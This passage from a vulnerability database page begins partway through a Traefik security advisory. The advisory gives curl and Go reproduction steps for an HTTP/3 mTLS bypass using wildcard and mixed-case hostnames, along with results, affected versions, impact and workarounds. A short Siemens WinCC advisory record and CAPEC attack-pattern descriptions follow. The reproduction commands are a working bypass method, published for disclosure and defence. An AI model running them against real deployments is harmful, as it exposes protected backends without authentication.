-skv   --resolve api.example.com:8443:127.0.0.1   https://api.example.com:8443/\n```\n\nObserved result:\n\n```text\nTLS alert ... certificate required\n```\n\n3. HTTP/3 bypass:\n\n```bash\ncurl --noproxy \u0027*\u0027 --http3-only -skv   --resolve api.example.com:8443:127.0.0.1   https://api.example.com:8443/\n```\n\nObserved result:\n\n```text\nHTTP/3 200\nName: PROTECTED\nHost: api.example.com:8443\n```\n\nExact-host mixed-case bypass:\n\n1. Start Traefik with the exact-host dynamic configuration above.\n2. Control over TCP/TLS:\n\n```bash\ncurl --noproxy \u0027*\u0027 --http2 -skv   --resolve api.example.com:8443:127.0.0.1   https://api.example.com:8443/\n```\n\nObserved result:\n\n```text\nTLS alert ... certificate required\n```\n\n3. Mixed-case HTTP/2 control:\n\n```bash\ncurl --noproxy \u0027*\u0027 --http2 -skv   --resolve API.EXAMPLE.COM:8443:127.0.0.1   https://API.EXAMPLE.COM:8443/\n```\n\nObserved result:\n\n```text\nTLS alert ... certificate required\n```\n\nThis control confirms that the bypass is specific to the HTTP/3 TLS configuration selection path in this test setup. The HTTP/2 request to the same mixed-case hostname still fails with `certificate required`.\n\n4. HTTP/3 bypass with the same mixed-case hostname:\n\n```bash\nTLS_SERVER_NAME=API.EXAMPLE.COM HTTP_HOST=API.EXAMPLE.COM   go run ./h3-case-client.go\n```\n\nObserved result:\n\n```text\nHTTP/3.0 200\nName: PROTECTED\nHost: API.EXAMPLE.COM\n```\n\nLocal regression tests used during validation:\n\n```bash\ngo test ./pkg/server/router/tcp   -run \u0027TestGetTLSGetClientInfo_(WildcardCurrentBehavior|ExactHostCaseSensitivityCurrentBehavior)$\u0027   -count=1\n```\n\nThese tests were added locally during analysis to demonstrate the current behavior of `GetTLSGetClientInfo()`. They are not required to reproduce the issue; the Docker and `curl`/HTTP3 commands above are the end-to-end reproduction.\n\nVersion matrix observed with Docker images:\n\n```text\nwildcard H3 bypass: affected on v3.7.0 and v3.7.1\nexact-case H3 bypass: affected on v3.6.17, v3.7.0, and v3.7.1\n```\n\nThe wildcard case was tested on v3.7.x because wildcard `Host` / `HostSNI` matching and TLSOptions association for wildcard domains were introduced in v3.7.0.\n\n### Impact\n\nDeployments that use router `TLSOptions` as an access-control boundary for HTTP/3 can expose protected backends without client authentication.\n\nThe highest-impact case is mTLS:\n\n- normal HTTP/2/TCP access to the protected host requires a client certificate\n- HTTP/3 access to the same route falls back to the default TLS config\n- the request is then routed to the protected backend without satisfying the route\u0027s mTLS policy\n\nThis can expose confidential data or privileged backend operations to unauthenticated network clients. The issue is especially severe because it does not require credentials, user interaction, or a prior foothold.\n\nPossible workarounds until a fix is available:\n\n- Disable HTTP/3 on entrypoints that rely on router-specific mTLS.\n- Enforce mTLS in the default TLS options as well, so fallback TLS configuration is not weaker than router-specific configuration.\n- Block UDP access to the HTTP/3 entrypoint.\n- Enforce client authentication at an additional layer behind Traefik.\n\n\u003c/details\u003e\n\n---",
  "id": "GHSA-9cr8-q42q-g8m7",
  "modified": "2026-06-16T21:04:29Z",
  "published": "2026-06-16T21:04:29Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/security/advisories/GHSA-9cr8-q42q-g8m7"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/traefik/traefik"
    },
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/releases/tag/v3.7.3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Traefik: HTTP/3 mTLS bypass via exact SNI TLSOptions lookup for wildcard and mixed-case hosts"
}

GHSA-9FJF-27F3-W5W8

Vulnerability from github – Published: 2022-05-13 01:36 – Updated: 2022-05-13 01:36
VLAI
Details

A vulnerability was discovered in Siemens SIMATIC WinCC Sm@rtClient for Android (All versions before V1.0.2.2) and SIMATIC WinCC Sm@rtClient for Android Lite (All versions before V1.0.2.2). An attacker with physical access to an unlocked mobile device, that has the affected app running, could bypass the app's authentication mechanism under certain conditions.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2017-6871"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287",
      "CWE-288"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-08-08T00:29:00Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability was discovered in Siemens SIMATIC WinCC Sm@rtClient for Android (All versions before V1.0.2.2) and SIMATIC WinCC Sm@rtClient for Android Lite (All versions before V1.0.2.2). An attacker with physical access to an unlocked mobile device, that has the affected app running, could bypass the app\u0027s authentication mechanism under certain conditions.",
  "id": "GHSA-9fjf-27f3-w5w8",
  "modified": "2022-05-13T01:36:23Z",
  "published": "2022-05-13T01:36:23Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-6871"
    },
    {
      "type": "WEB",
      "url": "https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-589378.pdf"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/99582"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design

Funnel all access through a single choke point to simplify how users can access a resource. For every access, perform a check to determine if the user has permissions to access the resource.

CAPEC-127: Directory Indexing

An adversary crafts a request to a target that results in the target listing/indexing the content of a directory as output. One common method of triggering directory contents as output is to construct a request containing a path that terminates in a directory name rather than a file name since many applications are configured to provide a list of the directory's contents when such a request is received. An adversary can use this to explore the directory tree on a target as well as learn the names of files. This can often end up revealing test files, backup files, temporary files, hidden files, configuration files, user accounts, script contents, as well as naming conventions, all of which can be used by an attacker to mount additional attacks.

CAPEC-665: Exploitation of Thunderbolt Protection Flaws

An adversary leverages a firmware weakness within the Thunderbolt protocol, on a computing device to manipulate Thunderbolt controller firmware in order to exploit vulnerabilities in the implementation of authorization and verification schemes within Thunderbolt protection mechanisms. Upon gaining physical access to a target device, the adversary conducts high-level firmware manipulation of the victim Thunderbolt controller SPI (Serial Peripheral Interface) flash, through the use of a SPI Programing device and an external Thunderbolt device, typically as the target device is booting up. If successful, this allows the adversary to modify memory, subvert authentication mechanisms, spoof identities and content, and extract data and memory from the target device. Currently 7 major vulnerabilities exist within Thunderbolt protocol with 9 attack vectors as noted in the Execution Flow.